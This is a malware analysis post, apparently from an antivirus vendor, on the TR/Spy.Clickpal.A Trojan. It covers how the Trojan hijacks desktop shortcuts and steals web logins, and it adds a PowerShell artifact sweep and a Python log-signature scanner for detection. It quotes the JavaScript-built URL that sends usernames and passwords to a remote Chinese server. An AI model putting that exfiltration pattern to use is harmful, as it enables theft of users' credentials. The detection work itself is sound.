Closer look on TR/Spy.Clickpal.A

We analyzed a Trojan Spy sample because the way it spreads through the operating system and sends out information stolen from the user is interesting. Right after execution the malware searches for .lnk files on the user’s desktop and in the special folders. It then follows the path of the executable the shortcut points to and creates a copy of itself in the target directory, using the name of the original file. The original executable is renamed to “click_%executable name%.exe”. Interestingly, the Trojan does not delete the original files, it just renames them.

After a successful infection the malware is executed in place of the original program and starts the renamed executable. This means the user will usually not notice that the target behind the .lnk files has been replaced. This is part of the Trojan’s strategy to remain undetected as long as possible.
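The shortcut hijack described above leaves a simple artifact on disk: next to the executable a shortcut points to, a copy of the original named click_<name>.exe. The following PowerShell sweep is an added example for checking a machine for that artifact; it is not code from the post or from Avira. It assumes the WScript.Shell COM object is available to resolve shortcut targets, and the list of special folders it walks is an assumption, since the post does not name which folders the Trojan searches.

```powershell
# Added example: report shortcuts whose target has a "click_<name>.exe" sibling,
# the rename described in the post. Read-only; nothing is deleted or changed.

$shell = New-Object -ComObject WScript.Shell

# Assumed sweep list: the desktop plus the usual Start Menu special folders.
$folders = @(
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('DesktopDirectory'),
    [Environment]::GetFolderPath('Programs'),
    [Environment]::GetFolderPath('StartMenu'),
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonPrograms'),
    [Environment]::GetFolderPath('CommonStartMenu'),
    [Environment]::GetFolderPath('CommonDesktopDirectory')
) | Where-Object { $_ -and (Test-Path $_) } | Sort-Object -Unique

function Test-HijackedShortcut {
    param([string]$LnkPath)

    # Resolve where the .lnk actually points.
    $target = $shell.CreateShortcut($LnkPath).TargetPath
    if (-not $target -or -not (Test-Path $target)) { return $null }

    # The Trojan keeps the original beside its copy, prefixed with "click_".
    $dir             = Split-Path -Parent $target
    $name            = Split-Path -Leaf   $target
    $renamedOriginal = Join-Path $dir ("click_" + $name)

    if (Test-Path $renamedOriginal) {
        [PSCustomObject]@{
            Shortcut        = $LnkPath
            Target          = $target
            RenamedOriginal = $renamedOriginal
            # An unsigned target next to a renamed original is a strong signal.
            TargetSignature = (Get-AuthenticodeSignature $target).Status
        }
    }
}

$findings = foreach ($folder in $folders) {
    Get-ChildItem -Path $folder -Filter *.lnk -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object { Test-HijackedShortcut -LnkPath $_.FullName }
}

if ($findings) {
    $findings | Format-List
} else {
    "No click_<name>.exe siblings found next to any shortcut target."
}
```

Because the Trojan does not delete the originals, a hit also tells you which file to restore once the copy has been removed: the click_ prefixed sibling is the legitimate program.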

Microsoft’s Internet Explorer is directly targeted for this action:

The Trojan does not modify registry keys or use any other autorun mechanism provided by the operating system; this is not necessary, because the Trojan is executed as soon as the user opens one of the hijacked shortcuts. The memory dump shows a list of web address fragments that the Trojan monitors. During monitoring it looks for login forms and login scripts in PHP and ASP pages.


The login information collected while the user accesses these web sites is sent to a remote server. To do so the Trojan makes use of some JavaScript code. The script gathers the username, the password and the current web page and sends them to a server located in China. Such a request to the remote address could look like:

http://www2.%RemoteAddress%.cn/dedaoinfo/?info=’+window.location.href+’@@@@’+login.username.value+’@@@@’+login.password.value
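The request format above gives a proxy or IDS operator a clean network signature: a GET to a /dedaoinfo/ path whose info parameter carries three fields joined by @@@@. The Python below is an added detection example, not code from the post or from Avira; it runs that signature over a few constructed proxy log lines and masks the password in the resulting alert so the log review does not re-leak the credential. The host name in the sample is a placeholder standing in for the post's %RemoteAddress%, and the log line layout is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Signature pieces taken from the request format quoted in the post.
EXFIL_PATH = "/dedaoinfo/"
FIELD_SEPARATOR = "@@@@"

# Constructed sample proxy log (not real traffic). Assumed line layout:
# "<timestamp> <client-ip> <method> <url> <status>". The host on line 2 is a
# placeholder for the %RemoteAddress% host from the post.
SAMPLE_LOG = """\
2009-01-01T10:00:00 10.0.0.5 GET http://www.example.org/index.html 200
2009-01-01T10:00:02 10.0.0.5 GET http://www2.remoteaddress-placeholder.cn/dedaoinfo/?info=http://mail.example.org/login.php@@@@alice@@@@s3cret 200
2009-01-01T10:00:03 10.0.0.7 GET http://www.example.org/dedaoinfo/?info=nothing 404
2009-01-01T10:00:04 10.0.0.7 POST http://www.example.org/login.asp 302
"""

LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<status>\d+)$"
)


def parse_exfil_request(url):
    """Return the page/username/password triple carried by a Clickpal-style
    request, or None when the URL does not match the exfiltration format."""
    parts = urlsplit(url)
    if not parts.path.startswith(EXFIL_PATH):
        return None
    info = parse_qs(parts.query).get("info")
    if not info:
        return None
    # The injected script joins exactly three values with "@@@@".
    fields = unquote(info[0]).split(FIELD_SEPARATOR)
    if len(fields) != 3:
        return None
    page, username, password = fields
    return {"page": page, "username": username, "password": password}


def mask(secret):
    """Keep only the length of a credential so alerts do not re-leak it."""
    return "*" * len(secret)


def scan_log(text):
    """Run every log line through the signature and return one alert per hit."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hit = parse_exfil_request(m.group("url"))
        if hit is None:
            continue
        alerts.append({
            "timestamp": m.group("ts"),
            "client": m.group("client"),
            "exfil_host": urlsplit(m.group("url")).hostname,
            "stolen_from": hit["page"],
            "username": hit["username"],
            "password": mask(hit["password"]),
        })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The third sample line hits the same path but carries no @@@@-separated fields, so it is ignored: matching on the path alone would fire on unrelated sites, while the three-field structure is what the injected script actually produces. Matching on the structure rather than on a host name also keeps the rule working if the operator changes the remote server.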

Most of the targeted web sites are Chinese, such as

  • youku.com
  • tudou.com
  • sogou.com
  • soho.com

as well as big global Internet sites such as

  • msn.com
  • paypal.com
  • google.com
  • youtube.com
  • yahoo.com

The Trojan itself is written in Visual Basic and is not packed or otherwise obfuscated in any way. Avira protects from this threat and detects it as TR/Spy.Clickpal.A.

Alexandru Dinu
Virus Researcher